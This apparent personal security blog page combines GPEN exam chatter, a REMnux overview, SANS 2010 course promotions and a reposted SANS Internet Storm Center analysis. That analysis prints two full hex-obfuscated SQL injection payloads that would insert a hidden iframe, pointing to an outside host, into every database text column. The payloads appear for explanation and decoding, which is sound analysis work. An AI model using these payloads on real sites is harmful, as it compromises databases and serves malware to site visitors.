security.crudtastic.com

I’ll be honest .. after doing the Offensive-Security Pentesting with Backtrack course, sitting the SANS SEC-560 course lost a bit of its lustre for me. Nothing against the course .. it was awesome .. and I love all the SANS stuff!! The OffSec course though was pretty tough and I had only just completed it a few months before the SANS training, and to be honest, the OffSec course went a lot deeper.

I originally thought I’d give myself a break from doing SANS stuff for a while .. then I woke up yesterday .. and with 30 days left to sit the GPEN exam I booked it! Funnily enough, straight after that I looked at signing up for 2 other SANS courses ahahhahaah.

So now I have the task of getting ready to sit in exam in 15 days after not looking at the books in over 2 months (im so bad). This is very reminicent of my GSEC study (do a search for my post) .. and I managed to nail that ok.

Anyway .. i’m whining about my GPEN when Chris is about to head off and tackle his GSE .. Good luck nerdlinger!!

A cool post from the SANS INTERNET STORM CENTER

Reader Alan reported a series of records that are similar to an SQL injection but are obfuscated. The following records were reported:

declare%20@s%20varchar(4000);set%20@s=cast(0x6445634c417245204054207661526368615228323535292c406320
764152434841722832353529206465634c417265207461624c455f635572734f5220435552534f5220466f522053454c45437420412e6e61
6d652c622e6e614d652066726f4d207379734f626a6543747320612c737973434f4c754d4e73206220776865524520612e69643d422e6964
20614e4420412e58745950653d27552720616e642028622e78545950653d3939206f7220622e58547970653d3335206f5220422e7854595
0653d323331204f5220622e78747970453d31363729206f50454e205441624c655f637552736f72206645544348206e6558542046524f6d2
05461426c455f437552734f7220494e744f2040542c4063207768696c4528404046657443685f7374417475533d302920626547496e20657
845632827557044615445205b272b40742b275d20536554205b272b40632b275d3d727452494d28434f4e5665525428564152434841722
834303030292c5b272b40432b275d29292b636153542830783343363936363732363136443635323037333732363333443232363837343
73437303341324632463645363536443646363837353639364336343639363936453245373237353246373436343733324636373646324
53730363837303346373336393634334433313232323037373639363437343638334432323330323232303638363536393637363837343
34432323330323232303733373437393643363533443232363436393733373036433631373933413645364636453635323233453343324
6363936363732363136443635334520615320766152434861722831303629292729204645544368204e6578742066526f6d207441426c65
5f635572734f7220496e744f2040742c406320456e4420436c6f7365207461626c455f437552736f52206445414c4c6f43415465205461424c6
55f435552736f7220%20as%20varchar(4000));exec(@s);–

declare%20@s%20varchar(4000);set%20@s=cast(0x6465636c617245204054205661726368417228323535292c406320
566172436861522832353529206465436c615265207441624c455f637552736f7220437552536f7220664f522073454c45435420412e4e616d452
c622e4e616d652066726f4d207379734f626a6563547320612c735973634f6c754d6e73206220576865524520612e69643d422e496420416e4420
612e78545970453d27552720414e642028622e58745950653d3939204f5220622e58747950653d3335204f5220622e78747950453d323331206f7
220422e58747950453d31363729206f70454e207441426c455f437552734f72206665746348206e4578742046724f6d205441426c655f637572736
f7220494e546f2040742c4043205748694c6528404066655463485f7374615475733d302920624547694e20455845632827557064615465205b27
2b40742b275d20536574205b272b40632b275d3d727472494d28434f6e7665525428764172434841722834303030292c5b272b40432b275d2929
2b63615374283078334336393636373236313644363532303733373236333344323236383734373437303341324632463645363536443646363
8373536393643363436393639364532453732373532463734363437333246363736463245373036383730334637333639363433443331323232
3037373639363437343638334432323330323232303638363536393637363837343344323233303232323037333734373936433635334432323
6343639373337303643363137393341364536463645363532323345334332463639363637323631364436353345204173205641726348615228
31303629292729204645546348206e4578542046524f4d205441626c655f437572734f5220494e546f2040742c406320654e6420436c4f53652054
61624c455f635552734f52206445416c6c6f43415445205461426c455f435552736f5220%20as%20varchar(4000));exec(@s);–

In both cases we see the use of the CAST command. What is its purpose? To change the information from a data type to another. Since the type of data that is contained in the sentence CAST is hexadecimal and varchar conversion is requested, we can do it manually with an ASCII table. Let’s use the table in http://www.asciitable.com  to perform the conversion. Keep in mind that two hexadecimal digits correspond to one byte. The conversion of the first seven bytes is as follows:

ATTACK # 1		ATTACK # 2
Byte	ASCII Equivalent	Byte	ASCII Equivalent
64	d	64	d
45	E	65	e
63	c	63	c
4C	L	6C	l
41	A	61	a
72	r	72	r
45	E	45	E

continue reading…

REMnux: A Linux Distribution for Reverse-Engineering Malware

REMnux is a lightweight Linux distribution for assisting malware analysts in reverse-engineering malicious software. The distribution is based on Ubuntu and is maintained by Lenny Zeltser.

About REMnux

REMnux is designed for running services that are useful to emulate within an isolated laboratory environment when performing behavioral malware analysis. As part of this process, the analyst typically infects another laboratory system with the malware sample and directs potentially-malicious connections to the REMnux system that’s listening on the appropriate ports. REMnux is also useful for analyzing web-based malware, such as malicious JavaScript, Java programs, and Flash files. It also has tools for analyzing malicious documents, such as Microsoft Office and Adobe PDF files, and utilities for reversing malware through memory forensics. In these cases, malware may be loaded onto REMnux and analyzed directly on the REMnux system without requiring other systems to be present in the lab. You can learn about malware analysis techniques that make use of the tools installed and pre-configured on REMnux by taking my course on Reverse-Engineering Malware (REM) at SANS Institute.

What REMnux Is Not

REMnux isn’t a fancy distribution that was built from scratch… In simple terms, it’s a virtual machine that runs Ubuntu and has various useful malware tools set up on it. REMnux does not aim to include all malware analysis tools in existence. Many of these tools are designed to work on Windows, and investigators prefer to use Windows systems for running such tools. If you are interested in running Windows analysis tools on a Linux platform, take a look at the Zero Wine project. If you are looking for a more full-featured Linux distribution focused on forensic analysis, take a look at SANS Investigative Forensic Toolkit (SIFT) Workstation.

Orignal HERE

SANS Brisbane has just kicked off !!

More pics to come during the week

Following a very successful program in 2009, we are returning to Australia’s Capital City for SANS Canberra 2010 on 12-17 July to deliver SANS’ world-class information security training.

Register by 3 June to receive the best savings on the following courses:

• Security 401: SANS Security Essentials Bootcamp Style (GSEC) taught by Mark Hofman, SANS Certified Instructor
• Security 503: Intrusion Detection In-Depth (GCIA) taught by Johannes Ullrich, Ph.D., SANS Certified Instructor
• Audit 507: Auditing Networks, Perimeters, and Systems (GSNA) taught by James Tarala, SANS Senior Instructor
• Forensics 610: Reverse-Engineering Malware: Hands-On Analysis Tools and Techniques (GREM) taught by Michael Murr, SANS Certified Instructor
• Security 577: Virtualization Security Fundamentals – NEW! taught by James Tarala, SANS Senior Instructor

For complete course descriptions see our Event-at-Glance page.

Put the skills you’ll learn to practical use and more than GIAC certified professionals who make the info sec industry safe! Visit the GIAC Roadmap page for more information and register for your certification attempt today!

SANS training is well-known for being relevant and pragmatic. Out Canberra 2010 instructors are industry leaders and experts who understand the challenges you face on a daily basis. Their real-world experience increases the practical value of the course material.

Classes will be held at the National Convention Centre in Canberra. Canberra is one of Australia’s few planned cities, a place where architectural style complements the beauty of the surrounding Australian bush. Located on the ancient lands of the traditional owners, the Ngunnawal people, Canberra is thought to derive its name from the Aboriginal word Kamberra or ‘meeting place.’ Canberra is known for its hospitality with its trendy cafes, restaurants, nightclubs, museums and galleries, boutique shopping. Explore the cities trails and weekend markets for fresh regional produce and local wines.

To follow or tweet about this event, use hashtag #sanscanberra. Follow SANS at @SANSInstitute.

Get the training you need to advance your career. Start making your training and travel plans now to join us for SANS Canberra 2010!

http://www.sans.org/brisbane-2010/night.php

SANS @Night

Look Out! Open Source Extrusion Detection

- Eric Conrad
- Tuesday 25 May * 7:00pm – 8:00pm

Your firewall has been turned inside-out. With the advent of client-side attacks, infected USB drives, and infected mobile devices, perimeter network defenses have failed. The bad guys are already in. How do you stop them? By looking out. This talk will discuss techniques for detecting the outbound flow of sensitive information: extrusion detection. Eric Conrad will discuss the successful attacks and failed perimeter defenses that lead to the creation of Xfiltr8, the open source Extrusion Detection live CD

Read Eric’s bio here: http://www.sans.org/brisbane-2010/faculty.php

Location

The Marque
103 George Street
Brisbane, Queensland

To register:

Send RSVP to  rkantor@shearwater.com.au 

In the email please state:

Full Name

Company

SANS is bringing world-class training to Queensland for SANS Brisbane 2010 on 24-29 May! (http://www.sans.org/info/54773) Why not choose the beauty of the city along the Brisbane River as the backdrop for your training? Register by 14 April to receive the best savings on the following courses:

- Security 401: SANS Security Essentials Bootcamp Style (GSEC) taught by Mark Hofman, SANS Certified Instructor

- Security 560: Network Penetration Testing and Ethical Hacking (GPEN) taught by Eric Conrad, SANS Certified Instructor

Below is a brief snapshot of what each course covers. For complete course descriptions see: http://www.sans.org/info/54774

- SEC 401: Security 401: SANS Security Essentials Bootcamp Style (GSEC).
In this course you will learn the language and underlying theory of computer security. At the same time you will learn the essential, up-to-the-minute knowledge and skills required for effective performance if you are given the responsibility for securing systems and/or organizations. This course meets both of the key promises SANS makes to our students: (1) You will gain up-to-the-minute knowledge you can put into practice immediately upon returning to work; and, (2) You will be
taught by the best security instructors in the industry.

Maximize your training time and turbo-charge your career in information security by learning the full SANS Security Essentials curriculum needed to qualify for the GSEC certification.

- SEC 560: Network Penetration Testing and Ethical Hacking (GPEN) covers the ingredients for successful network penetration testing to help attendees improve their enterprise’s security stance.

FIND SECURITY FLAWS BEFORE THE BAD GUYS DO! We address detailed pre-test planning, including setting up an effective penetration testing infrastructure and establishing ground rules with the target organization to avoid surprises and misunderstanding. Then, we discuss a time-tested methodology for penetration and ethical hacking across the network, evaluating the security of network services and the operating systems behind them.

Both courses are associated with a GIAC Certification (GSEC and GPEN). Put the skills you’ll learn to practical use and more than GIAC certified professionals who make the info sec industry safe!  Visit http://www.giac.org/info/54779 for more information and register for your certification attempt today!

SANS training is well-known for being relevant and pragmatic. All SANS instructors are industry leaders and experts who understand the challenges you face on a daily basis.  Their real-world experience increases the practical value of the course material.  Here are some comments from recent alumni:

“The SANS class (SEC401) stands out above the rest because of the subject matter experts who teach the classes and labs.” – Shirlee Eitel-Birgham, State of Nevada

“Anyone who is in the network penetration testing field should take this course (SEC560) to improve your current skills and learn new ones.” - Nick Ramser, Ohio State University

“This is the way you need to learn: roll up your sleeves, dig in to the fundamentals and the nitty-gritty technical details, and then go ’hands-on’ to practice and reinforce what you’ve been taught.” – Joseph Price, DoD

Classes will be held at the Marque Brisbane Hotel, which is located in the heart of the city and just a minute walk to the Brisbane River. The central location is the ideal base from which to explore some of Brisbane’s best attractions. Cruise the river, shop along Queen Street, enjoy the Treasury Casino or the South Bank Parklands. A special discount rate of AUS $179 S/D will be honored based on space availability. This discount is only available through 22 April, so take advantage of this special offer and make your reservations today! For more information see http://www.sans.org/info/54784

To follow or tweet about this event, use hashtag #sansbrisbane. Follow SANS at http://twitter.com/SANSInstitute

Get the training you need to advance your career.  Start making your training and travel plans now to join us for SANS Brisbane 2010! (http://www.sans.org/info/54773)